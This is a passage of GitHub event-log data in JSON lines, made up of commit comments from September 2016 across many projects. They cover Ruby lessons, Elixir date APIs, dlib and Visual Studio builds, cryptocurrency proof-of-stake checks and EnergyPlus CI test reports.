{"id":"4565139185","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":19028244,"position":18,"line":18,"path":"lesson_4/main.rb","commit_id":"402fc82f907f3d044deaec0f38e551a0bf76bd08","created_at":"2016-09-14T22:59:56Z","updated_at":"2016-09-14T22:59:56Z","body":"Можно использовать метод `p` вместо `puts`, но лучше переопределить `to_s`. Что с этим не вышло?"}},"created_at":"2016-09-14T22:59:56Z"}
{"id":"4565141679","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas-kramdown"},"payload":{"comment":{"id":19028250,"position":null,"line":null,"path":null,"commit_id":"db987a70bc1e1ebbce732ddc395ce18ab1df20ef","created_at":"2016-09-14T23:00:35Z","updated_at":"2016-09-14T23:00:35Z","body":"/cc @jcredding "}},"created_at":"2016-09-14T23:00:35Z"}
{"id":"4565142440","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"kvirc/KVIrc"},"payload":{"comment":{"id":19028254,"position":6,"line":336,"path":"src/kvirc/kernel/KviOptions.cpp","commit_id":"379f9b8f65fa479490af45b2f469eb731cff9c0e","created_at":"2016-09-14T23:00:46Z","updated_at":"2016-09-14T23:00:46Z","body":"it does say to reuse unused entries before adding new ones"}},"created_at":"2016-09-14T23:00:46Z"}
{"id":"4565142730","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/deas-kramdown"},"payload":{"comment":{"id":19028256,"position":null,"line":null,"path":null,"commit_id":"dcb2ca0fdc174e92bebe69637e0c4d895cd9a545","created_at":"2016-09-14T23:00:50Z","updated_at":"2016-09-14T23:00:50Z","body":"/cc @jcredding "}},"created_at":"2016-09-14T23:00:50Z"}
{"id":"4565143387","type":"CommitCommentEvent","actor":{"login":"carzidco"},"repo":{"name":"robertosequeira/coursera-spa-angular"},"payload":{"comment":{"id":19028257,"position":null,"line":null,"path":null,"commit_id":"121f02251617bf1c009bbdab1137ff10296e0781","created_at":"2016-09-14T23:01:01Z","updated_at":"2016-09-14T23:01:01Z","body":"Please create a PR and then destroy you :) :octocat: "}},"created_at":"2016-09-14T23:01:01Z"}
{"id":"4565146297","type":"CommitCommentEvent","actor":{"login":"navsreks"},"repo":{"name":"navsreks/DLN-Validation"},"payload":{"comment":{"id":19028264,"position":null,"line":null,"path":null,"commit_id":"c9f15f609c731e034bef937732aaece2a8bd78e5","created_at":"2016-09-14T23:01:50Z","updated_at":"2016-09-14T23:01:50Z","body":"@sricharan123 Please review the changes I made. should I add an error message for each pattern? how do I add this to our pmp-ui project?"}},"created_at":"2016-09-14T23:01:50Z"}
{"id":"4565146413","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19028266,"position":null,"line":null,"path":null,"commit_id":"8186fd100e8c9e01a07b68f453c7b086584aee9a","created_at":"2016-09-14T23:01:52Z","updated_at":"2016-09-14T23:01:52Z","body":"**Map.cpp:**\r\nhttps://github.com/TwistedScorpio/OTHire/blob/master/source/map.cpp#L1092\r\n\r\nI changed the code to be equal to:\r\nhttps://github.com/otland/forgottenserver/blob/master/src/map.cpp#L844\r\n\r\nDo you know what's the difference?\r\ncost += MAP_NORMALWALKCOST * **3**;\r\ncost += MAP_NORMALWALKCOST * **18**;"}},"created_at":"2016-09-14T23:01:52Z"}
{"id":"4565149318","type":"CommitCommentEvent","actor":{"login":"bdionne"},"repo":{"name":"bdionne/protege-client"},"payload":{"comment":{"id":19028272,"position":36,"line":36,"path":"src/main/java/org/protege/editor/owl/client/TabViewableChecker.java","commit_id":"d882144b598df405db89f4baf710534c50945b95","created_at":"2016-09-14T23:02:40Z","updated_at":"2016-09-14T23:02:40Z","body":"meh, sure it's cleaner but the constants in `getProjectManagerRole()` are out of sync with the config file, it would fail I think"}},"created_at":"2016-09-14T23:02:40Z"}
{"id":"4565152062","type":"CommitCommentEvent","actor":{"login":"lau"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19028278,"position":218,"line":758,"path":"lib/elixir/lib/calendar.ex","commit_id":"e50735ff2a7c16cc7705d8fa59af906e986c19f7","created_at":"2016-09-14T23:03:22Z","updated_at":"2016-09-14T23:03:22Z","body":"> Should we then add from_naive_datetime to DateTime and have folks doing the conversion through there then?\r\n\r\nYes! If there is function like `DateTime.from_naive_to_utc` that says \"Hey, even though the NaiveDateTime struct does not contain time zone information, I the programmer know that it is UTC (or maybe I just want to do some hack), so please give me a DateTime in UTC\". This way you can do what you want to do, but have to consciously add that extra function call. So you don't accidentally take some NaiveDateTime and inadvertently tell the world that it is UTC because a function just assumed that information. Ideally if you know about the time zone it would have been created as a DateTime though.\r\n\r\nOf course a similar \"promote naive to datetime\" function could also exist for non-UTC time zones if we had tzdata. Taking a timezone name as an argument.\r\n\r\nRegarding gregorian seconds since they are an Erlang thing that is not UTC specific, functions for those would make sense to have in NaiveDateTime. They are naturally naive. Just like the datetime tuples. Again a \"promote to DateTime\" function could be used after creating a NaiveDateTime from gregorian seconds."}},"created_at":"2016-09-14T23:03:22Z"}
{"id":"4565155862","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19028290,"position":6,"line":747,"path":"github-dark.css","commit_id":"74714c579811d7e2327181c36f73d35d1df959ab","created_at":"2016-09-14T23:04:22Z","updated_at":"2016-09-14T23:04:22Z","body":"just to show unstyled portion"}},"created_at":"2016-09-14T23:04:22Z"}
{"id":"4565158399","type":"CommitCommentEvent","actor":{"login":"FFTEAM"},"repo":{"name":"nx111/oscam"},"payload":{"comment":{"id":19028296,"position":null,"line":null,"path":null,"commit_id":"616fe8793175a5dedc35e688bc400b3098570c9e","created_at":"2016-09-14T23:05:02Z","updated_at":"2016-09-14T23:05:02Z","body":"Please add VideoGuard Pairing  inflict\r\n\r\nD3 74 23 00 ..."}},"created_at":"2016-09-14T23:05:02Z"}
{"id":"4565160197","type":"CommitCommentEvent","actor":{"login":"xyklex"},"repo":{"name":"dkrimmer84/l10n_co_point_of_sale"},"payload":{"comment":{"id":19028302,"position":null,"line":null,"path":null,"commit_id":"e09895db55aeb4a0b3eaa7394b5ba1a6b7fc6b6d","created_at":"2016-09-14T23:05:29Z","updated_at":"2016-09-14T23:05:29Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;EOU2zMao&#x2F;250-bug-pos-error-cuando-uno-valida-un-ticket-sin-cliente\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> BUG: POS - Error cuando uno valida un ticket sin cliente</a>"}},"created_at":"2016-09-14T23:05:29Z"}
{"id":"4565162110","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19028308,"position":null,"line":null,"path":null,"commit_id":"a989978ad19dd2d22d6faff96dccf44608571a18","created_at":"2016-09-14T23:05:47Z","updated_at":"2016-09-14T23:05:47Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 36](http://teamcity.otenv.com/viewLog.html?buildId=5215191&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:05:51"}},"created_at":"2016-09-14T23:05:47Z"}
{"id":"4565162208","type":"CommitCommentEvent","actor":{"login":"grefab"},"repo":{"name":"davisking/dlib"},"payload":{"comment":{"id":19028309,"position":null,"line":null,"path":null,"commit_id":"48df23a0e065e01c5ba176d4999fffb0d9a29e02","created_at":"2016-09-14T23:05:48Z","updated_at":"2016-09-14T23:05:48Z","body":"Whoa, good job ranting against VC2015! ;) I'd like to add that MS neglected their C++ compiler for a long time in favour of C# which is noticeable. I'm totally on your side, most of the other development stuff I do is with OSX using clang, which feels pretty close to linux development environment if you use homebrew. But, sadly in this case it is not up to me:\r\n\r\nThe software I write must (at the moment) run under windows and, due to some deployment issues, must be compiled with visual studio. So at the moment I do all the development with windows/mingw32-gcc and build the deployment package on a separate machine running visual studio. The benefit of working with gcc when you have dependencies is worth the overhead of having two (virtual) machines. It try to push the guys to try linux, but they are hesitant.\r\n\r\nIn this use case it would be okay to have DNN running slowly on the CPU. I intend to use them pre-trained for classifaication purposes. Training will happen before on some machine with GPU support. Currently I try to build a prototype for that.\r\n\r\nThanks for the nice reply! I'll hopefully get my hands dirty with that dlib/MSVC2015 compatibility when the prototype works on gcc."}},"created_at":"2016-09-14T23:05:48Z"}
{"id":"4565162694","type":"CommitCommentEvent","actor":{"login":"jbbejarano"},"repo":{"name":"jbbejarano/indiana_erp"},"payload":{"comment":{"id":19028311,"position":null,"line":null,"path":null,"commit_id":"14e9cd1611186672bfefc5124addf2b33bdbb8b6","created_at":"2016-09-14T23:05:56Z","updated_at":"2016-09-14T23:05:56Z","body":"Sistema ERP para Indiana"}},"created_at":"2016-09-14T23:05:56Z"}
{"id":"4565169797","type":"CommitCommentEvent","actor":{"login":"afucher"},"repo":{"name":"killerall/advpl-vscode"},"payload":{"comment":{"id":19028320,"position":null,"line":null,"path":null,"commit_id":"7d9c3bd6590412a0ae35f079516e9e8079496363","created_at":"2016-09-14T23:07:54Z","updated_at":"2016-09-14T23:07:54Z","body":"initial language server added to extension #25 "}},"created_at":"2016-09-14T23:07:54Z"}
{"id":"4565170520","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19028321,"position":null,"line":null,"path":null,"commit_id":"9129b400badd0cd3758267e75ae868f093bc807d","created_at":"2016-09-14T23:08:07Z","updated_at":"2016-09-14T23:08:07Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2334 of 2335 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T23:08:07Z"}
{"id":"4565170529","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19028322,"position":null,"line":null,"path":null,"commit_id":"26dfab7c9a33717ecc73c19b421501faff23806b","created_at":"2016-09-14T23:08:07Z","updated_at":"2016-09-14T23:08:07Z","body":"This is pointless. It will not make any difference."}},"created_at":"2016-09-14T23:08:07Z"}
{"id":"4565177538","type":"CommitCommentEvent","actor":{"login":"thefosk"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19028334,"position":6,"line":308,"path":"kong/plugins/request-transformer/access.lua","commit_id":"bd8f0f060e3c2713398d09c93a0a43c04f697f0d","created_at":"2016-09-14T23:10:06Z","updated_at":"2016-09-14T23:10:06Z","body":"Implemented in the `schema.lua`."}},"created_at":"2016-09-14T23:10:06Z"}
{"id":"4565177908","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19028337,"position":6,"line":747,"path":"github-dark.css","commit_id":"74714c579811d7e2327181c36f73d35d1df959ab","created_at":"2016-09-14T23:10:13Z","updated_at":"2016-09-14T23:10:13Z","body":"@un1versal likes turtles."}},"created_at":"2016-09-14T23:10:13Z"}
{"id":"4565178959","type":"CommitCommentEvent","actor":{"login":"staticfox"},"repo":{"name":"kvirc/KVIrc"},"payload":{"comment":{"id":19028340,"position":6,"line":336,"path":"src/kvirc/kernel/KviOptions.cpp","commit_id":"379f9b8f65fa479490af45b2f469eb731cff9c0e","created_at":"2016-09-14T23:10:28Z","updated_at":"2016-09-14T23:10:28Z","body":"That comment is old. You decided to delete all the unused ones so it is no longer valid."}},"created_at":"2016-09-14T23:10:28Z"}
{"id":"4565180540","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19028344,"position":null,"line":null,"path":null,"commit_id":"9129b400badd0cd3758267e75ae868f093bc807d","created_at":"2016-09-14T23:10:53Z","updated_at":"2016-09-14T23:10:53Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2368 of 2369 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T23:10:53Z"}
{"id":"4565181549","type":"CommitCommentEvent","actor":{"login":"t4im"},"repo":{"name":"minetest/minetest_game"},"payload":{"comment":{"id":19028346,"position":31,"line":140,"path":"mods/stairs/init.lua","commit_id":"b848e35ca59c9eea3dbe3df87cb14d6bfea93f9a","created_at":"2016-09-14T23:11:09Z","updated_at":"2016-09-14T23:11:09Z","body":"They aren't nil from `get_node` though. `get_node_or_nil` could be nil for content_ignore."}},"created_at":"2016-09-14T23:11:09Z"}
{"id":"4565182688","type":"CommitCommentEvent","actor":{"login":"jsdevel"},"repo":{"name":"kogosoftwarellc/express-openapi"},"payload":{"comment":{"id":19028351,"position":3,"line":227,"path":"index.d.ts","commit_id":"602ed42e9770a6250a8703e697c78d068deb1014","created_at":"2016-09-14T23:11:28Z","updated_at":"2016-09-14T23:11:28Z","body":"doh!  I'll update it now."}},"created_at":"2016-09-14T23:11:28Z"}
{"id":"4565184998","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"kvirc/KVIrc"},"payload":{"comment":{"id":19028353,"position":6,"line":336,"path":"src/kvirc/kernel/KviOptions.cpp","commit_id":"379f9b8f65fa479490af45b2f469eb731cff9c0e","created_at":"2016-09-14T23:12:09Z","updated_at":"2016-09-14T23:12:09Z","body":"Its very valid, theres quite a few unused that came after that if you care to actually look."}},"created_at":"2016-09-14T23:12:09Z"}
{"id":"4565191946","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":19028369,"position":69,"line":69,"path":"lesson_4/train.rb","commit_id":"402fc82f907f3d044deaec0f38e551a0bf76bd08","created_at":"2016-09-14T23:14:03Z","updated_at":"2016-09-14T23:14:03Z","body":"Да, потому что `protected` делает метод закрытым для доступа за пределами области видимости объекта."}},"created_at":"2016-09-14T23:14:03Z"}
{"id":"4565194260","type":"CommitCommentEvent","actor":{"login":"bcoe"},"repo":{"name":"olalonde/pgtools"},"payload":{"comment":{"id":19028376,"position":null,"line":null,"path":null,"commit_id":"5c729f890d1a7deb785e922d10a3691b1aa6335d","created_at":"2016-09-14T23:14:38Z","updated_at":"2016-09-14T23:14:38Z","body":"@olalonde there you have it, new release process is working (this CHANGELOG is auto-generated based on commit [message format](https://github.com/conventional-changelog/standard-version)).\r\n\r\nI've also added test coverage, [`86%`](https://coveralls.io/github/olalonde/pgtools?branch=master) ain't too bad.\r\n\r\n"}},"created_at":"2016-09-14T23:14:38Z"}
{"id":"4565194444","type":"CommitCommentEvent","actor":{"login":"jsdevel"},"repo":{"name":"kogosoftwarellc/express-openapi"},"payload":{"comment":{"id":19028377,"position":3,"line":227,"path":"index.d.ts","commit_id":"602ed42e9770a6250a8703e697c78d068deb1014","created_at":"2016-09-14T23:14:41Z","updated_at":"2016-09-14T23:14:41Z","body":"Updated on `v0.29.x`.  I'll update `v0.28.x` shortly."}},"created_at":"2016-09-14T23:14:41Z"}
{"id":"4565198420","type":"CommitCommentEvent","actor":{"login":"zyszys1992"},"repo":{"name":"YoubeeVivi/hw"},"payload":{"comment":{"id":19028383,"position":null,"line":null,"path":null,"commit_id":"678202cfae44b32b514ba7ce8d069810cd6475ab","created_at":"2016-09-14T23:15:48Z","updated_at":"2016-09-14T23:15:48Z","body":"1,2,3,4,9,11,12"}},"created_at":"2016-09-14T23:15:48Z"}
{"id":"4565199257","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19028384,"position":null,"line":null,"path":null,"commit_id":"9129b400badd0cd3758267e75ae868f093bc807d","created_at":"2016-09-14T23:16:01Z","updated_at":"2016-09-14T23:16:01Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T23:16:01Z"}
{"id":"4565200276","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19028387,"position":6,"line":747,"path":"github-dark.css","commit_id":"74714c579811d7e2327181c36f73d35d1df959ab","created_at":"2016-09-14T23:16:19Z","updated_at":"2016-09-14T23:16:19Z","body":"@mottie like dags"}},"created_at":"2016-09-14T23:16:19Z"}
{"id":"4565217841","type":"CommitCommentEvent","actor":{"login":"phaazon"},"repo":{"name":"lolengine/lol"},"payload":{"comment":{"id":19028419,"position":30,"line":30,"path":"src/gpu/blit.lolfx","commit_id":"bb98e8d5783dbca74506a6f7d84079598c3ef898","created_at":"2016-09-14T23:20:58Z","updated_at":"2016-09-14T23:20:58Z","body":"That’s fair enough then. :)"}},"created_at":"2016-09-14T23:20:58Z"}
{"id":"4565223370","type":"CommitCommentEvent","actor":{"login":"seanho00"},"repo":{"name":"sermons/reveal-skel"},"payload":{"comment":{"id":19028427,"position":null,"line":null,"path":null,"commit_id":"c5ff54f02db6813d41c5cb9dd32735648c686377","created_at":"2016-09-14T23:22:27Z","updated_at":"2016-09-14T23:22:27Z","body":"#8"}},"created_at":"2016-09-14T23:22:27Z"}
{"id":"4565225232","type":"CommitCommentEvent","actor":{"login":"seanho00"},"repo":{"name":"sermons/reveal-skel"},"payload":{"comment":{"id":19028436,"position":null,"line":null,"path":null,"commit_id":"5d98ddeb9c984869bd1ef799bd0644e0a25a2463","created_at":"2016-09-14T23:22:56Z","updated_at":"2016-09-14T23:22:56Z","body":"#8"}},"created_at":"2016-09-14T23:22:56Z"}
{"id":"4565232132","type":"CommitCommentEvent","actor":{"login":"jasonkuhrt"},"repo":{"name":"neongreen/haskell-ex"},"payload":{"comment":{"id":19028449,"position":null,"line":null,"path":null,"commit_id":"84fdcd608bd14bc080e252b829137b49e0ab3a93","created_at":"2016-09-14T23:24:52Z","updated_at":"2016-09-14T23:24:52Z","body":"@neongreen Thanks as always. Took your feedback and wrote it verbosely into the file. Helps me learn more."}},"created_at":"2016-09-14T23:24:52Z"}
{"id":"4565232650","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"globant-ui/startup"},"payload":{"comment":{"id":19028450,"position":16,"line":16,"path":"00-HTML-CSS-basics/media.html","commit_id":"2553d9dd1f9d5ad5c03ff8ebbba07ab9716bf342","created_at":"2016-09-14T23:25:01Z","updated_at":"2016-09-14T23:25:01Z","body":"Try to implement the html 5 tag `<video/>` with a local, small video."}},"created_at":"2016-09-14T23:25:01Z"}
{"id":"4565237237","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"nitrogen-project/android_packages_apps_Settings"},"payload":{"comment":{"id":19028460,"position":null,"line":null,"path":null,"commit_id":"9797f55cd1eca60fa46f9c3e101fda8985ec03d1","created_at":"2016-09-14T23:26:15Z","updated_at":"2016-09-14T23:26:15Z","body":"Oh, thanks)"}},"created_at":"2016-09-14T23:26:15Z"}
{"id":"4565240730","type":"CommitCommentEvent","actor":{"login":"jessesmith91"},"repo":{"name":"ChicoState/RateMyRental"},"payload":{"comment":{"id":19028467,"position":null,"line":null,"path":null,"commit_id":"80967b2045257699c240ba803f63252659e831a7","created_at":"2016-09-14T23:27:13Z","updated_at":"2016-09-14T23:27:13Z","body":"I mostly made this small commit to make sure that everything was working as desired."}},"created_at":"2016-09-14T23:27:13Z"}
{"id":"4565244917","type":"CommitCommentEvent","actor":{"login":"priyanka1985"},"repo":{"name":"priyanka1985/helloworld"},"payload":{"comment":{"id":19028477,"position":null,"line":null,"path":null,"commit_id":"1a6712d02bbd145e486b6c5d7c4fda44023ba3f9","created_at":"2016-09-14T23:28:23Z","updated_at":"2016-09-14T23:28:23Z","body":"Entering to the github world"}},"created_at":"2016-09-14T23:28:23Z"}
{"id":"4565248279","type":"CommitCommentEvent","actor":{"login":"playful"},"repo":{"name":"aiwanyule/aiwanba"},"payload":{"comment":{"id":19028484,"position":null,"line":null,"path":null,"commit_id":"38c32a923e42a0f06f1d660849a483da5b457253","created_at":"2016-09-14T23:29:21Z","updated_at":"2016-09-14T23:29:21Z","body":"33"}},"created_at":"2016-09-14T23:29:21Z"}
{"id":"4565266016","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"globant-ui/startup"},"payload":{"comment":{"id":19028516,"position":7,"line":7,"path":"00-HTML-CSS-basics/media.html","commit_id":"2553d9dd1f9d5ad5c03ff8ebbba07ab9716bf342","created_at":"2016-09-14T23:34:14Z","updated_at":"2016-09-14T23:34:14Z","body":"I will acept this `<table>` for now, but in the future try to avoid using tables to position content (we do not do that since 1999! :P ). In the next topics you will learn better ways to create nice layouts."}},"created_at":"2016-09-14T23:34:14Z"}
{"id":"4565267754","type":"CommitCommentEvent","actor":{"login":"lucascomp"},"repo":{"name":"lucascomp/EDL"},"payload":{"comment":{"id":19028519,"position":null,"line":null,"path":null,"commit_id":"83c848391622050bf67ef1cb4e763e77a38f6163","created_at":"2016-09-14T23:34:44Z","updated_at":"2016-09-14T23:34:44Z","body":"Professor, caso seja dúvida:\r\nA pontuação será dividida igualmente entre Tiago e eu."}},"created_at":"2016-09-14T23:34:44Z"}
{"id":"4565268125","type":"CommitCommentEvent","actor":{"login":"bitbandi"},"repo":{"name":"CryptoCoderz/Espers"},"payload":{"comment":{"id":19028521,"position":5,"line":992,"path":"src/main.cpp","commit_id":"befc443d912c2d54756c0016a8aaedb8eb2a117f","created_at":"2016-09-14T23:34:49Z","updated_at":"2016-09-14T23:34:49Z","body":"    if(pindexBest->nHeight < nPoS25PhaseStart){"}},"created_at":"2016-09-14T23:34:49Z"}
{"id":"4565268969","type":"CommitCommentEvent","actor":{"login":"bitbandi"},"repo":{"name":"CryptoCoderz/Espers"},"payload":{"comment":{"id":19028524,"position":10,"line":996,"path":"src/main.cpp","commit_id":"befc443d912c2d54756c0016a8aaedb8eb2a117f","created_at":"2016-09-14T23:35:04Z","updated_at":"2016-09-14T23:35:04Z","body":"    else if(pindexBest->nHeight < nPoS5PhaseStart){"}},"created_at":"2016-09-14T23:35:04Z"}
{"id":"4565270814","type":"CommitCommentEvent","actor":{"login":"bitbandi"},"repo":{"name":"CryptoCoderz/Espers"},"payload":{"comment":{"id":19028528,"position":14,"line":999,"path":"src/main.cpp","commit_id":"befc443d912c2d54756c0016a8aaedb8eb2a117f","created_at":"2016-09-14T23:35:35Z","updated_at":"2016-09-14T23:35:35Z","body":"    else if(pindexBest->nHeight < nPoS1PhaseStart){"}},"created_at":"2016-09-14T23:35:35Z"}
{"id":"4565272388","type":"CommitCommentEvent","actor":{"login":"cjcjameson"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":19028531,"position":null,"line":null,"path":null,"commit_id":"2c588d3940b5711b951f5dfb8291b5e039b88eec","created_at":"2016-09-14T23:36:01Z","updated_at":"2016-09-14T23:36:01Z","body":"Sweet, great use of `input_mapping`"}},"created_at":"2016-09-14T23:36:01Z"}
{"id":"4565273524","type":"CommitCommentEvent","actor":{"login":"mavasani"},"repo":{"name":"dotnet/roslyn-project-system"},"payload":{"comment":{"id":19028535,"position":22,"line":51,"path":"netci.groovy","commit_id":"a66763502ac46acd640490340789fd97832bbdec","created_at":"2016-09-14T23:36:21Z","updated_at":"2016-09-14T23:36:21Z","body":"Attempting to clone the roslyn-internal repo via the batch script in the job failed due to missing credentials. I was able to get this working by manually changing the generated VSI job to use the \"Multiple SCMs\" feature in Jenkins and specifying both the required git repos:\r\n\r\n![multiplescms](https://cloud.githubusercontent.com/assets/10605811/18533589/05cb3d82-7a99-11e6-9eed-9d2256f61e19.png)\r\n\r\n@mmitche @tannergooding I need your help here in figuring out how to translate this manual change into actual code in netci.groovy so we get multiple SCMs in the generated VSI job."}},"created_at":"2016-09-14T23:36:21Z"}
{"id":"4565280039","type":"CommitCommentEvent","actor":{"login":"hdashnow"},"repo":{"name":"elegant-scipy/elegant-scipy"},"payload":{"comment":{"id":19028551,"position":16,"line":102,"path":"markdown/preface.markdown","commit_id":"796de1b871b8a099de723c707913a53c2e87bc54","created_at":"2016-09-14T23:38:12Z","updated_at":"2016-09-14T23:38:12Z","body":"In 2014 Thomas Robitaille and Chris Beaumont documented Python's growing use in Astronomy."}},"created_at":"2016-09-14T23:38:12Z"}
{"id":"4565284477","type":"CommitCommentEvent","actor":{"login":"davisking"},"repo":{"name":"davisking/dlib"},"payload":{"comment":{"id":19028563,"position":null,"line":null,"path":null,"commit_id":"48df23a0e065e01c5ba176d4999fffb0d9a29e02","created_at":"2016-09-14T23:39:29Z","updated_at":"2016-09-14T23:39:29Z","body":"Ha, yeah :)   Visual Studio's bad standardards compliance has been a thorn\nin my side for years.  Only now am I putting C++11 stuff into dlib because\nof it, and VC2015 still doesn't support everything C++11 lets you do.\n"}},"created_at":"2016-09-14T23:39:29Z"}
{"id":"4565289021","type":"CommitCommentEvent","actor":{"login":"Cervator"},"repo":{"name":"Terasology/SimpleFarming"},"payload":{"comment":{"id":19028572,"position":null,"line":null,"path":null,"commit_id":"742e48565251753ef687b702a3eb638799c2e875","created_at":"2016-09-14T23:40:43Z","updated_at":"2016-09-14T23:40:43Z","body":"Great comment update! Woohoo documentation :-)"}},"created_at":"2016-09-14T23:40:43Z"}
{"id":"4565289870","type":"CommitCommentEvent","actor":{"login":"bitbandi"},"repo":{"name":"CryptoCoderz/Espers"},"payload":{"comment":{"id":19028573,"position":17,"line":1002,"path":"src/main.cpp","commit_id":"befc443d912c2d54756c0016a8aaedb8eb2a117f","created_at":"2016-09-14T23:40:58Z","updated_at":"2016-09-14T23:40:58Z","body":"no else? 25% pos again after 3000300 block height?"}},"created_at":"2016-09-14T23:40:58Z"}
{"id":"4565291436","type":"CommitCommentEvent","actor":{"login":"flaminisx"},"repo":{"name":"SashaUkraine/SuccessClubSite"},"payload":{"comment":{"id":19028579,"position":null,"line":null,"path":null,"commit_id":"0708baaba1e6ebd52ce8b7651bfea96c0348f30f","created_at":"2016-09-14T23:41:24Z","updated_at":"2016-09-14T23:41:24Z","body":"forgot to write that I tried to fix socnet icons in team/_detailed_user.html.erb"}},"created_at":"2016-09-14T23:41:24Z"}
{"id":"4565294072","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"KnowSheet/CTFO_BE"},"payload":{"comment":{"id":19028583,"position":null,"line":null,"path":null,"commit_id":"6678dfff06535989233df69c1c85920c49eb692f","created_at":"2016-09-14T23:42:11Z","updated_at":"2016-09-14T23:42:11Z","body":":+1:"}},"created_at":"2016-09-14T23:42:11Z"}
{"id":"4565297392","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19028585,"position":null,"line":null,"path":null,"commit_id":"0997ad0eec80c2609a372526bdfc30604541ec0c","created_at":"2016-09-14T23:43:09Z","updated_at":"2016-09-14T23:43:09Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-MacOS-10.9-clang: OK (2329 of 2330 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-MacOS-10.9-clang.html'>![Test 